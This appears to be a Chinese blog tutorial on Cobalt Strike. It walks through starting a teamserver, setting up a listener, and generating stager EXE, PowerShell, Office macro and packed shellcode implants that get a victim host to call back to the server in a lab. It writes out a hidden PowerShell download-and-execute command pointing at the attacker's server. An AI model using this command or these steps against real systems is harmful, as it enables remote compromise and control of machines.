Cobalt Strike详细使用教程

工具介绍

CS是什么?

Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等

实验环境

本次实验环境 Kali_Linux: 10.9.23.183 teamserver团队服务器 Win11客户端 :10.9.23.2 Win11受害者:10.9.23.2

运行CobaltStrike工具必须要有java环境,所以要提前装好jdk.

CobaltStrike详细使用

1.启动CobaltStrike

因为服务端是kali,我们将server文件复制到kali

可以看到一共有4个参数 主机ip 密码 配置文件 木马到期时间

image.png

设置一个主机IP和密码即可 可以看到链接服务器的默认端口号为50050

 sudo ./teamserver 10.9.23.183 123456

image.png|525

2.客户端连接团队服务端

主机的ip地址就是kaliteamserver团队服务器(以下简称服务端)地址10.9.23.183 这里的user为服务端里的昵称 密码就是刚刚服务端中设置的密码:123456 只需要配置好IP和密码即可

image.png|475

连接成功>显示窗口

image.png|500

3.配置监听器

监听器可以理解为配置木马传输的管道 点击进来以后,会发现有很多种协议 按照下方设置即可 选择一个HTTP协议,命名为hppt,端口自定义设置,我设置成7777进行监听

image.png|525

点击save保存,监听开始

image.png

4.生成木马

这里演示四种木马的上线过程

1)Windows Stager Payload(EXE)

image.png|500

然后选择刚刚设置好的监听器,最后确认就行

image.png|500

配置木马生成的路径,这里我保存到桌面,给木马程序命名

image.png|500

保存之后,就会生成一个木马在桌面 因为受害者也在这台主机上 直接双击运行刚才生成的exe文件即可

目标服务器成功上线cs 这个sleep的大致意思表示,在客户端执行的操作命令每过一分钟 木马向我们服务器输入的操作命令框请求一下需要执行的命令,如果觉得命令请求时间太长,可手动输入命令sleep 2 来缩短请求时长

image.png|500

2)PowerShell

image.png

选择刚刚设置好的监听器,最后确认就行 端口最好用80端口,他需要开启80端口去借助url路径去吧木马传到受害主机上

image.png|500

复制出路径

 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.9.23.183:80/a'))"

|500

受害者主机去执行路径

image.png|500

目标服务器成功上线cs

image.png

唯一不同点就是看通过哪个恶意的进程上线的这个主机,pid为进程号 木马前期没有弄结束日期的话我们就要去受害者主机去手动删除一下占用的进程号 客户端单方面删除没用 受害机再次启动我们服务器这边就上线了

3)office宏病毒

image.png

点击之后会出现office宏病毒的使用方式 按照使用方式即可

image.png|500

将刚才复制的宏病毒代码编辑到文本里

image.png|500

最后保存为支持宏的文档

image.png

受害者主打开带有宏病毒的word文档 目标服务器成功上线cs

image.png|500

4)shellcode

image.png|500

选择监听器 生成.c文件

image.png|500

这里使用掩日工具做一个套壳 将刚才的.c文件套壳为exe文件

image.png|500

此时就有一个.exe文件 受害者主机去执行这个文件 目标服务器成功上线cs

image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值